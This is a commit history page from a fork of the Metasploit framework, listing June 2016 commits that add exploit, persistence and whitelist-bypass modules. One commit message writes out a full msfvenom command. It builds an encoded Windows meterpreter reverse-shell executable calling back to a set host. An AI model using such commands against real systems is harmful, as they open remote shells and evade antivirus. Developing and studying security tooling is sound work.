adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
41,886 Commits 27 Branches 1,043 Tags
f8a94de6710abe3042a26a9dca38dcccff2c93be
Commit Graph

10172 Commits

Author SHA1 Message Date
khr0x40sh 40d7de05ef Fix Payload Generation 
Payload generation now only occurs once and function 'setup_pay'
removed.  Payload is generated with cmd_psh_payload and is mutated to
fit dropped text file.
 2016-06-23 11:20:22 -04:00
Tod Beardsley fc79f3a2a9 Modify for only NodeJS 
Not sure if we can do multiple arch's in the same module. Doesn't look
like it's possible today.

See rapid7#7015
 2016-06-23 10:14:57 -05:00
Scott Davis 579a3bcf7c default payload is NOT text based, so do nothing with it. 2016-06-23 07:00:14 -07:00
Scott Davis 47e4321424 CVE-2016-5641 2016-06-23 06:09:37 -07:00
agix 378208bc3d Move service stub in x86 encoder to be easily used. 
Add psexec option SERCVICE_STUB_ENCODER to allow a list of encoder to
encode the x86/service stub.
Add multiple_encode_payload function in payload_generator.rb to accept a
list of encoder (beginning with @ to not break the classic parsing of
encoder).
With this it would be possible to pass multiple encoder to msfvenom in
one execution.
./msfvenom -p windows/meterpreter/reverse_tcp LPORT=80
LHOST=192.168.100.11 -e
@x86/shikata_ga_nai,x86/misc_anti_emu:5,x86/shikata_ga_nai -x
template.exe -f exe-only -o meterpreter.exe
 2016-06-23 14:56:03 +02:00
h00die 18a3bf5f62 service persistence 2016-06-22 19:22:18 -04:00
wchen-r7 de5152401a Land #6992, Add tiki calendar exec exploit 2016-06-22 11:18:14 -05:00
wchen-r7 8697d3d6fb Update tiki_calendar_exec module and documentation 2016-06-22 11:17:45 -05:00
khr0x40sh df1a9bee13 Move ps1, Use Env var, Fix license, New Cleanup 
MS16-032 ps1 moved to external file.  This ps1 will now detect windir
to find cmd.exe.  The module now also detects windir to find
powershell.exe.  The license is now BSD_LICENSE, and the required
copyright has been moved to the ps1. The previous optional cleanup stage
 is now standard.  The optional 'W_PATH' assignment is corrected to
select the user's variable unless 'W_PATH' is nil.
 2016-06-22 09:25:48 -04:00
h00die 0f2c1d886c append over read and write 2016-06-21 16:56:34 -04:00
h00die 9cb57d78d7 updated check and docs that 14.2 may not be vuln 2016-06-21 16:48:09 -04:00
khr0x40sh b9d0bcc193 Add MS16-032 Local Priv Esc Exploit to tree 
This module will use the powershell port of ms16-032 created by
@FuzzySec.  All payloads are pushed to a compress powershell script in a
plain text file on the disk to execute.
 2016-06-21 14:56:12 -04:00
h00die c7bacebd5b slight issues found by void-in 2016-06-21 05:12:10 -04:00
h00die 4b8f572976 cron persistence 2016-06-20 21:45:04 -04:00
h00die 15a3d739c0 fix per wchen 2016-06-20 17:57:10 -04:00
wchen-r7 2b85b210e9 Fix #6984, Undefined method 'winver' in ms10_092_schelevator 
Fix #6984
 2016-06-20 10:37:41 -05:00
William Vu 6cb2a6970e Fix unused SessionType in two modules 
Pretty sure it should be "shell."
 2016-06-19 23:41:34 -05:00
h00die 6fe7698b13 follow redirect automatically 2016-06-19 20:24:54 -04:00
h00die 3f25c27e34 2 void-in fixes of 3 2016-06-19 14:35:27 -04:00
h00die ddfd015310 functionalized calendar call, updated docs 2016-06-19 08:53:22 -04:00
h00die 3feff7533b tiki calendar 2016-06-18 13:11:11 -04:00
h00die ebde552982 gem version 2016-06-16 21:09:56 -04:00
Brendan Watters 9ea0b8f944 Land #6934, Adds exploit for op5 configuration command execution 2016-06-16 14:36:10 -05:00
William Vu ea988eaa72 Add setsid to persist the shell 
Prevents the watchdog from killing our session.
 2016-06-16 11:31:35 -05:00
h00die cfb034fa95 fixes all previously identified issues 2016-06-15 20:58:04 -04:00
h00die baa603b637 wvu-r7 rex sleep suggestions 2016-06-15 20:41:25 -04:00
Rob Fuller bca88d8443 Landing #6961 Regsvr32 SCT App Whitelist Bypass Server 
by @kn0

rts
 2016-06-15 15:28:02 -04:00
h00die 81fa068ef0 pulling out the get params 2016-06-15 12:27:31 -04:00
h00die 52db99bfae vars_post for post request 2016-06-15 07:24:41 -04:00
h00die 625d60b52a fix the other normalize_uri 2016-06-14 15:03:07 -04:00
h00die afc942c680 fix travis 2016-06-13 19:07:14 -04:00
h00die bd4dacdbc3 added Rank 2016-06-13 19:04:06 -04:00
h00die 72ed478b59 added exploit rank 2016-06-13 18:56:33 -04:00
h00die 40f7fd46f9 changes outlined by wvu-r7 2016-06-13 18:52:25 -04:00
William Webb 563b8206c5 Land #6962, Apache Continuum Exploit 2016-06-13 16:41:53 -05:00
Trenton Ivey 3a39d8020d Moving back to PSH option only 2016-06-13 12:44:21 -05:00
Trenton Ivey 52bbd22a81 Moving back to PSH option only 2016-06-13 12:10:48 -05:00
h00die f63273b172 email change 2016-06-11 21:05:34 -04:00
h00die bd6eecf7b0 centreon useralias first add 2016-06-11 20:57:18 -04:00
Trenton Ivey 8c7796c6d3 Module Cleanup 2016-06-11 18:12:42 -05:00
Trenton Ivey 46eff4c96d Added command option 2016-06-11 18:07:24 -05:00
William Vu ec1248d7af Convert to CmdStager 2016-06-10 20:42:01 -05:00
Trenton Ivey 6af3c4ab99 Added zero to Run method to prevent popup 2016-06-10 14:52:02 -05:00
William Vu 46239d5b0d Add Apache Continuum exploit 2016-06-09 22:35:38 -05:00
Trenton Ivey 17974d74e2 Removing space at end of line 2016-06-09 21:49:24 -05:00
Trenton Ivey 6cd1da414f Regsvr32.exe Application Whitelist Bypass Server 2016-06-09 21:15:07 -05:00
h00die d63dc5845e wvu-r7 comment fixes 2016-06-09 21:52:21 -04:00
h00die 16b4829d57 fixed socket.get issue 2016-06-09 21:36:21 -04:00
h00die 63db330a02 rubocop fixes, msftidy fixes 2016-06-09 21:03:57 -04:00
h00die 027f538300 original from EDB 2016-06-09 20:35:00 -04:00